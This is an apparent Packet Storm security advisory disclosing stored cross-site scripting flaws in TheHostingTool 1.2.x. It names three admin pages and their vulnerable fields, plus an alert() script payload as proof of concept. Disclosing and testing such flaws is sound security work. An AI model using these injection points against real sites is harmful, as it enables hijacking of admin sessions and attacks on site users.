TheHostingTool version 1.2.x suffers from multiple cross site scripting vulnerabilities.
b8ff28cc399a94a530cfdfd2f9d7d3a6540e7c41b39dc57e51fa08a0112da645#Title : TheHostingTool 1.2.x Multiple Cross Site Scripting
#Author : DevilScreaM
#Date : 7 Desember 2013
#Category : Web Applications
#Vendor : http://thehostingtool.com/
#Version : 1.2.x
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : Cross Site Scripting
POC & Exploit
XSS 1
http://127.0.0.1/admin/?page=servers&sub=add
At Column "Name" input your XSS
View Your XSS at
http://127.0.0.1/admin/?page=servers&sub=view
http://127.0.0.1/admin/?page=servers&sub=test
XSS 2
http://127.0.0.1/admin/?page=staff&sub=add
At Column "Username" input your XSS
View Your XSS At
http://127.0.0.1/admin/?page=staff&sub=edit
XSS 3
1. Create Category at http://127.0.0.1/admin/?page=kb&sub=cat
2. After Create Category, Create Article At http://127.0.0.1/admin/?page=kb&sub=art
3. At Column "Name" or "Article Name" input your XSS
Example <script>alert('DevilScreaM')</script>
4. View Your XSS at
http://127.0.0.1/support/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed